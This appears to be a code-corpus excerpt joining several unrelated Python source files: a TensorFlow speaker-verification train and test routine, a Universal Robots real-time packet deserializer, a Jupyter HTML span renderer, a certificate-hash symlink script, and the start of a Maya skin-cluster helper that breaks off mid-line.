zip(*optimizer.compute_gradients(loss)) # compute gradients of variables with respect to loss grads_clip, _ = tf.clip_by_global_norm(grads, 3.0) # l2 norm clipping by 3 grads_rescale= [0.01*grad for grad in grads_clip[:2]] + grads_clip[2:] # smaller gradient scale for w, b train_op= optimizer.apply_gradients(zip(grads_rescale, vars), global_step= global_step) # gradient update operation # check variables memory variable_count = np.sum(np.array([np.prod(np.array(v.get_shape().as_list())) for v in trainable_vars])) print("total variables :", variable_count) # record loss loss_summary = tf.summary.scalar("loss", loss) merged = tf.summary.merge_all() saver = tf.train.Saver() # training session with tf.Session() as sess: tf.global_variables_initializer().run() os.makedirs(os.path.join(path, "Check_Point"), exist_ok=True) # make folder to save model os.makedirs(os.path.join(path, "logs"), exist_ok=True) # make folder to save log writer = tf.summary.FileWriter(os.path.join(path, "logs"), sess.graph) epoch = 0 lr_factor = 1 # lr decay factor ( 1/2 per 10000 iteration) loss_acc = 0 # accumulated loss ( for running average of loss) for iter in range(config.iteration): # run forward and backward propagation and update parameters _, loss_cur, summary = sess.run([train_op, loss, merged], feed_dict={batch: random_batch(), lr: config.lr*lr_factor}) loss_acc += loss_cur # accumulated loss for each 100 iteration if iter % 10 == 0: writer.add_summary(summary, iter) # write at tensorboard if (iter+1) % 100 == 0: print("(iter : %d) loss: %.4f" % ((iter+1),loss_acc/100)) loss_acc = 0 # reset accumulated loss if (iter+1) % 10000 == 0: lr_factor /= 2 # lr decay print("learning rate is decayed! current lr : ", config.lr*lr_factor) if (iter+1) % 10000 == 0: saver.save(sess, os.path.join(path, "./Check_Point/model.ckpt"), global_step=iter//10000) print("model is saved!") # Test Session def test(path): tf.reset_default_graph() # draw graph enroll = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # enrollment batch (time x batch x n_mel) verif = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # verification batch (time x batch x n_mel) batch = tf.concat([enroll, verif], axis=1) # embedding lstm (3-layer default) with tf.variable_scope("lstm"): lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)] lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # make lstm op and variables outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn embedded = outputs[-1] # the last ouput is the embedded d-vector embedded = normalize(embedded) # normalize print("embedded size: ", embedded.shape) # enrollment embedded vectors (speaker model) enroll_embed = normalize(tf.reduce_mean(tf.reshape(embedded[:config.N*config.M, :], shape= [config.N, config.M, -1]), axis=1)) # verification embedded vectors verif_embed = embedded[config.N*config.M:, :] similarity_matrix = similarity(embedded=verif_embed, w=1., b=0., center=enroll_embed) saver = tf.train.Saver(var_list=tf.global_variables()) with tf.Session() as sess: tf.global_variables_initializer().run() # load model print("model path :", path) ckpt = tf.train.get_checkpoint_state(checkpoint_dir=os.path.join(path, "Check_Point")) ckpt_list = ckpt.all_model_checkpoint_paths loaded = 0 for model in ckpt_list: if config.model_num == int(model.split('-')[-1]): # find ckpt file which matches configuration model number print("ckpt file is loaded !", model) loaded = 1 saver.restore(sess, model) # restore variables from selected ckpt file break if loaded == 0: raise AssertionError("ckpt file does not exist! Check config.model_num or config.model_path.") print("test file path : ", config.test_path) # return similarity matrix after enrollment and verification time1 = time.time() # for check inference time if config.tdsv: S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False, noise_filenum=1), verif:random_batch(shuffle=False, noise_filenum=2)}) else: S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False), verif:random_batch(shuffle=False, utter_start=config.M)}) S = S.reshape([config.N, config.M, -1]) time2 = time.time() np.set_printoptions(precision=2) print("inference time for %d utterences : %0.2fs"%(2*config.M*config.N, time2-time1)) print(S) # print similarity matrix # calculating EER diff = 1; EER=0; EER_thres = 0; EER_FAR=0; EER_FRR=0 # through thresholds calculate false acceptance ratio (FAR) and false reject ratio (FRR) for thres in [0.01*i+0.5 for i in range(50)]: S_thres = S>thres # False acceptance ratio = false acceptance / mismatched population (enroll speaker != verification speaker) FAR = sum([np.sum(S_thres[i])-np.sum(S_thres[i,:,i]) for i in range(config.N)])/(config.N-1)/config.M/config.N # False reject ratio = false reject / matched population (enroll speaker = verification speaker) FRR = sum([config.M-np.sum(S_thres[i][:,i]) for i in range(config.N)])/config.M/config.N # Save threshold when FAR = FRR (=EER) if diff> abs(FAR-FRR): diff = abs(FAR-FRR) EER = (FAR+FRR)/2 EER_thres = thres EER_FAR = FAR EER_FRR = FRR print("\nEER : %0.2f (thres:%0.2f, FAR:%0.2f, FRR:%0.2f)"%(EER,EER_thres,EER_FAR,EER_FRR))
ur_driver/src/ur_driver/deserializeRT.py
Hugal31/universal_robot
749
30042
from __future__ import print_function import struct import copy #this class handles different protocol versions class RobotStateRT(object): @staticmethod def unpack(buf): rs = RobotStateRT() (plen, ptype) = struct.unpack_from("!IB", buf) if plen == 756: return RobotStateRT_V15.unpack(buf) elif plen == 812: return RobotStateRT_V18.unpack(buf) elif plen == 1044: return RobotStateRT_V30.unpack(buf) else: print("RobotStateRT has wrong length: " + str(plen)) return rs #this parses RobotStateRT for versions = v1.5 #http://wiki03.lynero.net/Technical/RealTimeClientInterface?foswiki_redirect_cache=9b4574b30760f720c6f79c5f1f2203dd class RobotStateRT_V15(object): __slots__ = ['time', 'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target', 'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values', 'unused', 'tcp_force', 'tool_vector', 'tcp_speed', 'digital_input_bits', 'motor_temperatures', 'controller_timer', 'test_value'] @staticmethod def unpack(buf): offset = 0 message_size = struct.unpack_from("!i", buf, offset)[0] offset+=4 if message_size != len(buf): print(("MessageSize: ", message_size, "; BufferSize: ", len(buf))) raise Exception("Could not unpack RobotStateRT packet: length field is incorrect") rs = RobotStateRT_V15() #time: 1x double (1x 8byte) rs.time = struct.unpack_from("!d",buf, offset)[0] offset+=8 #q_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.q_target = copy.deepcopy(all_values) #qd_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.qd_target = copy.deepcopy(all_values) #qdd_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.qdd_target = copy.deepcopy(all_values) #i_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.i_target = copy.deepcopy(all_values) #m_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.m_target = copy.deepcopy(all_values) #q_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.q_actual = copy.deepcopy(all_values) #qd_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.qd_actual = copy.deepcopy(all_values) #i_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.i_actual = copy.deepcopy(all_values) ### #tool_acc_values: 3x double (3x 8byte) all_values = list(struct.unpack_from("!ddd",buf, offset)) offset+=3*8 rs.tool_acc_values = copy.deepcopy(all_values) #unused: 15x double (15x 8byte) offset+=120 rs.unused = [] #tcp_force: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tcp_force = copy.deepcopy(all_values) #tool_vector: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tool_vector = copy.deepcopy(all_values) #tcp_speed: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tcp_speed = copy.deepcopy(all_values) #digital_input_bits: 1x double (1x 8byte) ? rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0] offset+=8 #motor_temperatures: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.motor_temperatures = copy.deepcopy(all_values) #controller_timer: 1x double (1x 8byte) rs.controller_timer = struct.unpack_from("!d",buf, offset)[0] offset+=8 #test_value: 1x double (1x 8byte) rs.test_value = struct.unpack_from("!d",buf, offset)[0] offset+=8 return rs #this parses RobotStateRT for versions <= v1.8 (i.e. 1.6, 1.7, 1.8) class RobotStateRT_V18(object): __slots__ = ['time', 'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target', 'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values', 'unused', 'tcp_force', 'tool_vector', 'tcp_speed', 'digital_input_bits', 'motor_temperatures', 'controller_timer', 'test_value', 'robot_mode', 'joint_modes'] @staticmethod def unpack(buf): offset = 0 message_size = struct.unpack_from("!i", buf, offset)[0] offset+=4 if message_size != len(buf): print(("MessageSize: ", message_size, "; BufferSize: ", len(buf))) raise Exception("Could not unpack RobotStateRT packet: length field is incorrect") rs = RobotStateRT_V18() #time: 1x double (1x 8byte) rs.time = struct.unpack_from("!d",buf, offset)[0] offset+=8 #q_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.q_target = copy.deepcopy(all_values) #qd_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.qd_target = copy.deepcopy(all_values) #qdd_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.qdd_target = copy.deepcopy(all_values) #i_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.i_target = copy.deepcopy(all_values) #m_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.m_target = copy.deepcopy(all_values) #q_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.q_actual = copy.deepcopy(all_values) #qd_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.qd_actual = copy.deepcopy(all_values) #i_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.i_actual = copy.deepcopy(all_values) #tool_acc_values: 3x double (3x 8byte) all_values = list(struct.unpack_from("!ddd",buf, offset)) offset+=3*8 rs.tool_acc_values = copy.deepcopy(all_values) #unused: 15x double (15x 8byte) offset+=120 rs.unused = [] #tcp_force: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tcp_force = copy.deepcopy(all_values) #tool_vector: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tool_vector = copy.deepcopy(all_values) #tcp_speed: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tcp_speed = copy.deepcopy(all_values) #digital_input_bits: 1x double (1x 8byte) ? rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0] offset+=8 #motor_temperatures: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.motor_temperatures = copy.deepcopy(all_values) #controller_timer: 1x double (1x 8byte) rs.controller_timer = struct.unpack_from("!d",buf, offset)[0] offset+=8 #test_value: 1x double (1x 8byte) rs.test_value = struct.unpack_from("!d",buf, offset)[0] offset+=8 #robot_mode: 1x double (1x 8byte) rs.robot_mode = struct.unpack_from("!d",buf, offset)[0] offset+=8 #joint_mode: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.joint_modes = copy.deepcopy(all_values) return rs #this parses RobotStateRT for versions >=3.0 (i.e. 3.0) class RobotStateRT_V30(object): __slots__ = ['time', 'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target', 'q_actual', 'qd_actual', 'i_actual', 'i_control', 'tool_vector_actual', 'tcp_speed_actual', 'tcp_force', 'tool_vector_target', 'tcp_speed_target', 'digital_input_bits', 'motor_temperatures', 'controller_timer', 'test_value', 'robot_mode', 'joint_modes', 'safety_mode', #6xd: unused 'tool_acc_values', #6xd: unused 'speed_scaling', 'linear_momentum_norm', #2xd: unused 'v_main', 'v_robot', 'i_robot', 'v_actual'] @staticmethod def unpack(buf): offset = 0 message_size = struct.unpack_from("!i", buf, offset)[0] offset+=4 if message_size != len(buf): print(("MessageSize: ", message_size, "; BufferSize: ", len(buf))) raise Exception("Could not unpack RobotStateRT packet: length field is incorrect") rs = RobotStateRT_V30() #time: 1x double (1x 8byte) rs.time = struct.unpack_from("!d",buf, offset)[0] offset+=8 #q_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.q_target = copy.deepcopy(all_values) #qd_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.qd_target = copy.deepcopy(all_values) #qdd_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.qdd_target = copy.deepcopy(all_values) #i_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.i_target = copy.deepcopy(all_values) #m_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.m_target = copy.deepcopy(all_values) #q_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.q_actual = copy.deepcopy(all_values) #qd_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.qd_actual = copy.deepcopy(all_values) #i_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.i_actual = copy.deepcopy(all_values) #i_control: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.i_control = copy.deepcopy(all_values) #tool_vector_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tool_vector_actual = copy.deepcopy(all_values) #tcp_speed_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tcp_speed_actual = copy.deepcopy(all_values) #tcp_force: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tcp_force = copy.deepcopy(all_values) #tool_vector_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tool_vector_target = copy.deepcopy(all_values) #tcp_speed_target: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.tcp_speed_target = copy.deepcopy(all_values) #digital_input_bits: 1x double (1x 8byte) ? rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0] offset+=8 #motor_temperatures: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.motor_temperatures = copy.deepcopy(all_values) #controller_timer: 1x double (1x 8byte) rs.controller_timer = struct.unpack_from("!d",buf, offset)[0] offset+=8 #test_value: 1x double (1x 8byte) rs.test_value = struct.unpack_from("!d",buf, offset)[0] offset+=8 #robot_mode: 1x double (1x 8byte) rs.robot_mode = struct.unpack_from("!d",buf, offset)[0] offset+=8 #joint_modes: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.joint_modes = copy.deepcopy(all_values) #safety_mode: 1x double (1x 8byte) rs.safety_mode = struct.unpack_from("!d",buf, offset)[0] offset+=8 #unused: 6x double (6x 8byte) offset+=48 #tool_acc_values: 3x double (3x 8byte) all_values = list(struct.unpack_from("!ddd",buf, offset)) offset+=3*8 rs.tool_acc_values = copy.deepcopy(all_values) #unused: 6x double (6x 8byte) offset+=48 #speed_scaling: 1x double (1x 8byte) rs.speed_scaling = struct.unpack_from("!d",buf, offset)[0] offset+=8 #linear_momentum_norm: 1x double (1x 8byte) rs.linear_momentum_norm = struct.unpack_from("!d",buf, offset)[0] offset+=8 #unused: 2x double (2x 8byte) offset+=16 #v_main: 1x double (1x 8byte) rs.v_main = struct.unpack_from("!d",buf, offset)[0] offset+=8 #v_robot: 1x double (1x 8byte) rs.v_robot = struct.unpack_from("!d",buf, offset)[0] offset+=8 #i_robot: 1x double (1x 8byte) rs.i_robot = struct.unpack_from("!d",buf, offset)[0] offset+=8 #v_actual: 6x double (6x 8byte) all_values = list(struct.unpack_from("!dddddd",buf, offset)) offset+=6*8 rs.v_actual = copy.deepcopy(all_values) return rs
text_extensions_for_pandas/jupyter/span.py
ZachEichen/text-extensions-for-pandas
193
30055
# # Copyright (c) 2021 IBM Corp. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # # span.py # # Part of text_extensions_for_pandas # # Support for span-centric Jupyter rendering and utilities # import textwrap from typing import * from enum import Enum import text_extensions_for_pandas.resources # TODO: This try/except block is for Python 3.6 support, and should be # reduced to just importing importlib.resources when 3.6 support is dropped. try: import importlib.resources as pkg_resources except ImportError: import importlib_resources as pkg_resources # Limits the max number of displayed documents. Matches Pandas' default display.max_seq_items. _DOCUMENT_DISPLAY_LIMIT = 100 class SetType(Enum): NESTED=1 OVERLAP=2 class RegionType(Enum): NESTED=1 COMPLEX=2 SOLO=3 def pretty_print_html(column: Union["SpanArray", "TokenSpanArray"], show_offsets: bool) -> str: """ HTML pretty-printing of a series of spans for Jupyter notebooks. Args: column: Span column (either character or token spans). show_offsets: True to generate a table of span offsets in addition to the marked-up text """ # Local import to prevent circular dependencies from text_extensions_for_pandas.array.span import SpanArray from text_extensions_for_pandas.array.token_span import TokenSpanArray if not isinstance(column, (SpanArray, TokenSpanArray)): raise TypeError(f"Expected SpanArray or TokenSpanArray, but received " f"{column} of type {type(column)}") # Gets the main script and stylesheet from the 'resources' sub-package style_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.css") script_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.js") # Declare initial variables common to all render calls instance_init_script_list: List[str] = [] # For each document, pass the array of spans and document text into the script's render function document_columns = column.split_by_document() for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(document_columns))): # Get a javascript representation of the column span_array = [] token_span_array = [] for e in document_columns[column_index]: span_array.append(f"""[{e.begin},{e.end}]""") if hasattr(e, "tokens"): token_span_array.append(f"""[{e.begin_token},{e.end_token}]""") document_object_script = f""" const doc_spans = [{','.join(span_array)}] const doc_text = '{_get_escaped_doctext(document_columns[column_index])}' """ # If the documents are a TokenSpanArray, include the start and end token indices in the document object. if len(token_span_array) > 0: document_object_script += f""" const doc_token_spans = [{','.join(token_span_array)}] documents.push({{doc_text: doc_text, doc_spans: doc_spans, doc_token_spans: doc_token_spans}}) """ else: document_object_script += """ documents.push({doc_text: doc_text, doc_spans: doc_spans}) """ instance_init_script_list.append(f""" {{ {document_object_script} }} """) # Defines a list of DOM strings to be appended to the end of the returned HTML. postfix_tags: List[str] = [] if len(document_columns) > _DOCUMENT_DISPLAY_LIMIT: postfix_tags.append(f""" <footer>Documents truncated. Showing {_DOCUMENT_DISPLAY_LIMIT} of {len(document_columns)}</footer> """) # Get the show_offsets parameter as a JavaScript boolean show_offset_string = 'true' if show_offsets else 'false' return textwrap.dedent(f""" <style class="span-array-css"> {textwrap.indent(style_text, ' ')} </style> <script> {{ {textwrap.indent(script_text, ' ')} }} </script> <div class="span-array"> {_get_initial_static_html(column, show_offsets)} <span style="font-size: 0.8em;color: #b3b3b3;">Your notebook viewer does not support Javascript execution. The above rendering will not be interactive.</span> </div> <script> {{ const Span = window.SpanArray.Span const script_context = document.currentScript const documents = [] {''.join(instance_init_script_list)} const instance = new window.SpanArray.SpanArray(documents, {show_offset_string}, script_context) instance.render() }} </script> {''.join(postfix_tags)} """) def _get_escaped_doctext(column: Union["SpanArray", "TokenSpanArray"]) -> List[str]: # Subroutine of pretty_print_html() above. # Should only be called for single-document span arrays. if not column.is_single_document: raise ValueError("Array contains spans from multiple documents. Can only " "render one document at a time.") text = column.document_text text_pieces = [] for i in range(len(text)): if text[i] == "'": text_pieces.append("\\'") elif text[i] == "\n": text_pieces.append("\\n") else: text_pieces.append(text[i]) return "".join(text_pieces) def _get_initial_static_html(column: Union["SpanArray", "TokenSpanArray"], show_offsets: bool) -> str: # Subroutine of pretty_print_html above. # Gets the initial static html representation of the column for notebook viewers without JavaScript support. # Iterates over each document and constructs the DOM string with template literals. # ! Text inserted into the DOM as raw HTML should always be sanitized to prevent unintended DOM manipulation # and XSS attacks. documents = column.split_by_document() documents_html = [] for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(documents))): document = documents[column_index] # Generate a dictionary to store span information, including relationships with spans occupying the same region. spans = {} is_token_document = False sorted_span_ids = [] for i in range(len(document)): span_data = {} span_data["id"] = i span_data["begin"] = document[i].begin span_data["end"] = document[i].end if hasattr(document[i], "tokens"): is_token_document = True span_data["begin_token"] = document[i].begin_token span_data["end_token"] = document[i].end_token span_data["sets"] = [] spans[i] = span_data sorted_span_ids.append(i) # Sort IDs sorted_span_ids.sort(key=lambda id: (spans[id]["begin"], -spans[id]["end"])) for i in range(len(sorted_span_ids)): span_data = spans[sorted_span_ids[i]] for j in range(i+1, len(sorted_span_ids)): sub_span_data = spans[sorted_span_ids[j]] # If the spans do not overlap, exit the sub-loop if(sub_span_data["begin"] >= span_data["end"]): break else: if(sub_span_data["end"] <= span_data["end"]): span_data["sets"].append({"type": SetType.NESTED, "id": sub_span_data["id"]}) else: span_data["sets"].append({"type": SetType.OVERLAP, "id": sub_span_data["id"]}) spans[sorted_span_ids[i]] = span_data # Generate the table rows DOM string from span data. table_rows_html = [] for i in range(len(spans)): span = spans[i] table_rows_html.append(f""" <tr> <td><b>{span["id"]}</b></td> <td>{span["begin"]}</td> <td>{span["end"]}</td> """) if is_token_document: table_rows_html.append(f""" <td>{span["begin_token"]}</td> <td>{span["end_token"]}</td> """) table_rows_html.append(f""" <td>{_get_sanitized_text(document.document_text[span["begin"]:span["end"]])}</td> </tr> """) # Generate the regions of the document_text to highlight from span data. mark_regions = [] i = 0 while i < len(document): region = {} region["root_id"] = i region["begin"] = spans[i]["begin"] set_span = _get_set_span(spans, i) region["end"] = set_span["end"] if len(spans[i]["sets"]) > 0: # get set span and type if(_is_complex(spans, i)): region["type"] = RegionType.COMPLEX else: region["type"] = RegionType.NESTED else: region["type"] = RegionType.SOLO mark_regions.append(region) i = set_span["highest_id"] + 1 # Generate the document_text DOM string from the regions created above. context_html = [] if len(mark_regions) == 0: # There are no marked regions. Just append the sanitized text as a raw string. context_html.append(_get_sanitized_text(document.document_text)) else: # Iterate over each marked region and contruct the HTML for preceding text and marked text. # Then, append that HTML to the list of DOM strings for the document_text. snippet_begin = 0 for region in mark_regions: context_html.append(f""" {_get_sanitized_text(document.document_text[snippet_begin:region["begin"]])} """) if region["type"] == RegionType.COMPLEX: context_html.append(f""" <span class='mark btn-info complex-set' style=' padding:0.4em; border-radius:0.35em; background:linear-gradient(to right, #a0c4ff, #ffadad); color: black; '>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])} <span class='mark-tag' style=' font-weight: bolder; font-size: 0.8em; font-variant: small-caps; font-variant-caps: small-caps; font-variant-caps: all-small-caps; margin-left: 8px; text-transform: uppercase; color: black; '>Set</span> </span> """) elif region["type"] == RegionType.NESTED: mark_html = [] nested_snippet_begin = region["begin"] # Iterate over each span nested within the root span of the marked region for nested_span in map( \ lambda set: spans[set["id"]], spans[region["root_id"]]["sets"]): mark_html.append(f""" {_get_sanitized_text(document.document_text[nested_snippet_begin:nested_span["begin"]])} <span class='mark btn-warning' style=' padding:0.2em 0.4em; border-radius:0.35em; background-color: #ffadad; color: black; '>{_get_sanitized_text(document.document_text[nested_span["begin"]:nested_span["end"]])}</span> """) nested_snippet_begin = nested_span["end"] mark_html.append(_get_sanitized_text(document.document_text[nested_snippet_begin:region["end"]])) context_html.append(f""" <span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{"".join(mark_html)}</span> """) elif region["type"] == RegionType.SOLO: context_html.append(f""" <span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}</span> """) snippet_begin = region["end"] context_html.append(_get_sanitized_text(document.document_text[snippet_begin:])) # Generate the document's DOM string documents_html.append(f""" <div class='document'> <table style=' table-layout: auto; overflow: hidden; width: 100%; border-collapse: collapse; '> <thead style='font-variant-caps: all-petite-caps;'> <th></th> <th>begin</th> <th>end</th> {"<th>begin token</th><th>end token</th>" if is_token_document else ""} <th style='text-align:right;width:100%'>context</th> </tr></thead> <tbody> {"".join(table_rows_html)} </tbody> </table> <p style=' padding: 1em; line-height: calc(var(--jp-content-line-height, 1.6) * 1.6); '> {"".join(context_html)} </p> </div> """) # Concat all documents and return the final DOM string return "".join(documents_html) def _get_set_span(spans: Dict, id: int) -> Dict: # Subroutine of _get_initial_static_html() above. # Recursive algorithm to get the last end and ID values of the set of spans connected to span with the given ID # Will raise a KeyError exception if an invalid key is given end = spans[id]["end"] highest_id = id # For each span in the set of spans, get the return values and track the greatest endpoint index and ID values. for set in spans[id]["sets"]: other = _get_set_span(spans, set["id"]) if other["end"] > end: end = other["end"] if other["highest_id"] > highest_id: highest_id = other["highest_id"] return {"end": end, "highest_id": highest_id} def _is_complex(spans: Dict, id: int) -> bool: # Subroutine of _get_initial_static_html() above. # Returns True if the provided span should be considered a "Complex" span. Implementation details below. # Will raise a KeyError exception if an invalid key is given # If any connection sets are of type:overlap or nested beyond a depth of 1, return True for set in spans[id]["sets"]: if set["type"] == SetType.OVERLAP: return True elif set["type"] == SetType.NESTED: if len(spans[set["id"]]["sets"]) > 0: return True return False def _get_sanitized_text(text: str) -> str: # Subroutine of _get_initial_static_html() above. # Returns a string with HTML reserved character replacements to avoid issues while rendering text as HTML text_pieces = [] for i in range(len(text)): if text[i] == "&": text_pieces.append("&amp;") elif text[i] == "<": text_pieces.append("&lt;") elif text[i] == ">": text_pieces.append("&gt;") elif text[i] == "\"": # Not strictly necessary, but just in case. text_pieces.append("&quot;") elif text[i] == "'": # Not strictly necessary, but just in case. text_pieces.append("&#39;") elif text[i] == "$": # Dollar sign messes up Jupyter's JavaScript UI. # Place dollar sign in its own sub-span to avoid being misinterpeted as a LaTeX delimiter text_pieces.append("<span>&#36;</span>") elif text[i] == "\n" or text[i] == "\r": # Support for in-document newlines by replacing with line break elements text_pieces.append("<br>") else: text_pieces.append(text[i]) return "".join(text_pieces)
support/distribute/binbuild/build/make_cert_links.py
rknop/amuse
131
30081
import os import os.path import subprocess import sys if __name__ == "__main__": dirname = sys.argv[1] for x in os.listdir(dirname): if x.endswith('.crt'): try: filename = os.path.join(dirname, x) filehash = subprocess.check_output(['openssl', 'x509', '-noout', '-hash', '-in', filename]).strip() filehash += '.0' hash_filename = os.path.join(dirname, filehash) if os.path.exists(hash_filename): print(x, filehash) os.remove(hash_filename) os.symlink(x, hash_filename) except: print("error in handling file:", filename)
DeformationLearningSolver/scripts/DLS/core/fnData.py
WebberHuang/DeformationLearningSolver
160
30083
<reponame>WebberHuang/DeformationLearningSolver<gh_stars>100-1000 __author__ = "<NAME>" __contact__ = "<EMAIL>" __website__ = "http://riggingtd.com" import maya.cmds as cmds import maya.OpenMaya as om import maya.OpenMayaAnim as oma from DLS.core import utils class FnSkinCluster(object): def __init__(self, skinCluster=None): """ Args: skinCluster (str, Optional): Defaults to None """ self.skinCluster = skinCluster if skinCluster: self.fn = oma.MFnSkinCluster(utils.getDependNode(skinCluster)) def setSkinCluster(self, skinCluster): """ Args: skinCluster (str, Optional): Defaults to None Returns: SkinClusterFn """ self.skinCluster = skinCluster self.fn = oma.MFnSkinCluster(utils.getDependNode(skinCluster)) return self def getLogicalInfluenceIndex(self,influence): """ Args: influence (str) Returns: int """ try: dagPath = utils.getDagPath(influence) except: raise utils.UserInputError("Could not find influence '%s' in %s" % (influence, self.skinCluster)) return self.fn.indexForInfluenceObject(dagPath) #---------------------------------------------------------------------- def getPhysicalInfluenceIndex(self, influence): """ Args: influence (str) Returns: int """ matrices = cmds.listConnections("%s.matrix" % self.skinCluster, s=1, d=0) return matrices.index(influence) #---------------------------------------------------------------------- def getInfluenceData(self, influence): """ Args: influence (str) Returns: WeightData """ try: dagPath = utils.getDagPath(influence) except: raise utils.UserInputError("Could not find influence '%s' in %s" % (influence, self.skinCluster)) selList = om.MSelectionList() weights = om.MDoubleArray() self.fn.getPointsAffectedByInfluence(dagPath, selList, weights) componentStr = [] selList.getSelectionStrings(componentStr) componentStr = cmds.ls(componentStr, ap=1, fl=1) weights = [w for w in weights] return WeightData(componentStr, weights) #---------------------------------------------------------------------- def listInfluences(self, asDagPath=True): """ Returns: list """ dagPaths = om.MDagPathArray() self.fn.influenceObjects(dagPaths) if asDagPath: return dagPaths else: return [dagPaths[i].partialPathName() for i in xrange(dagPaths.length())] #---------------------------------------------------------------------- def getWeightData(self, elements): """ Args: elements (list) Returns: SkinWeightData """ dagPath, components = utils.getDagPathComponents(elements) # Get all influences infs = self.listInfluences(asDagPath=False) influenceIndices = 